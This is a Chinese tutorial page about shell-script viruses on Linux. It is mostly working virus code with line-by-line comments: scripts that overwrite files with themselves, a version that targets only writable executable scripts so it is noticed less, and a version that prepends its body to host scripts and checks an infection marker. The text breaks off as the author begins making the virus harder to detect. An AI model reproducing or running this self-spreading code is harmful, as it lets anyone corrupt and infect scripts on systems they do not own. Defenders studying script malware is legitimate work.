当前位置: 首页 > 图文教程 > 操作系统 > Unix/Linux > 感染Linux系统脚本程序的病毒技术介绍

Unix/Linux
linux查看内存的大小
在linux下写的代码,用的是utf-8,结果拿到XP下运行的时候,所有的中文都成乱码
linux su和sudo命令的区别
linux cron 下的定时执行工具使用技巧
linux 查找进程及终止进程操作的相关命令
redhat linux 安装 gcc编译器
Linux Mplayer播放各种格式的电影
一起回顾一下linux常用命令
Linux 网站项目发布要做哪些配置
linux SSH配合SecureCRT的密匙完美使用方法
GD 编译出错解决方法
Facebook Open Platform编译FAQ
Linux 系统硬盘 优化
linux 挂载详解
linux crontab定时命令
Linux 系统中确保访问三级域名畅通的方法
Linux 特权帐号VS普通帐号
确保Linux系统安全的前提条件 漏洞防护
Linux 监视系统资源使用率
Red Hat Linux上使用BIND建立DNS服务器

Unix/Linux 中的 感染Linux系统脚本程序的病毒技术介绍


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-01   浏览: 25 ::
收藏到网摘: n/a

  主要的Shell病毒技术

当然,本文需要你至少了解Linux Shell编程的基础知识和一星点的病毒知识。OK!我们进入正题!

我们来看一个最原始的shell病毒,代码最能说明问题:

#shellvirus I for file in * do  cp $0 $file done

简单吧?遍历当前文件系统的所有文件,然后覆盖所有文件。但是,我们知道linux是多用户的操作系统,它的文件是具有保护模式的,所以以上的脚本有可能会报出一大堆的错误,所以它很快就会被管理员发现并制止它的传染。所以我们可以为该脚本做个判断,这样隐蔽性就大大增强了:

#shellvirus II for file in * do   if test -f $file   then   if test -x $file   then    if test -w $file    then    if grep -s echo $file >.mmm    then    cp $0 $file fi; fi; fi; fi; fi done rm .mmm -f

ok.我们改进了一下,加了若干的判断,判断文件是否存在,是否文件可执行,是否我们有权限写,再判断它是否是脚本程序如果是就cp $0 $file,所以这段代码是感然该系统所有的脚本程序的,危害性还是比较大的。

if grep -s echo $file>/.mmm

这句也可以这样写:

if file $file | grep -s 'Bourne shell script' > /dev/nul ; then,也就是判断file是否为shell脚本程序。但是,脚本病毒一旦在感染完毕之后就什么也不做了,它没有象二进制病毒那样的潜伏的危害性,而且以上的脚本只是简单的覆盖宿主而已,所以我这里利用了一下传统的二进制病毒的感染机制,效果也不错:),看看下面代码:

#infection head -n 24 $0 > .test    <-取自身保存到.test for file in *      <-遍历文件系统 do  if test -f $file    <-判断是否为文件  then    if test -x $file    <-判断文件是否可执行    then       if test -w $file  <-判断文件是否可写       then        if grep -s echo $file >.mmm  <-判断是否为脚本程序        then         head -n 1 $file >.mm    <-提取要感染的脚本程序的第一行         if grep -s infection .mm >.mmm  <-判断该文件是否已经被感染         then         rm -f .mm      <-已经被感染,则跳过         else        <-还未被感染         cat $file > .SAVEE    <-很熟悉吧?借用了传统的二进制文件的感染机制         cat .test > $file         cat .SAVEE >> $file  fi; fi; fi; fi; fi done rm .test .SAVEE .mmm .mm -f

程序的注解足以说明了,其实增加了潜伏的危害性,但还是特容易被发现,没办法的事情,shell脚本一般都是明文的,呵呵。不过危害性已经相当大了.这段程序用了一个感染标志:infection来判断是否已经被感染,着在程序中可以反应出来。

ok,为了使上面的代码不容易被发现,我必须优化它,最先考虑的肯定是精练代码: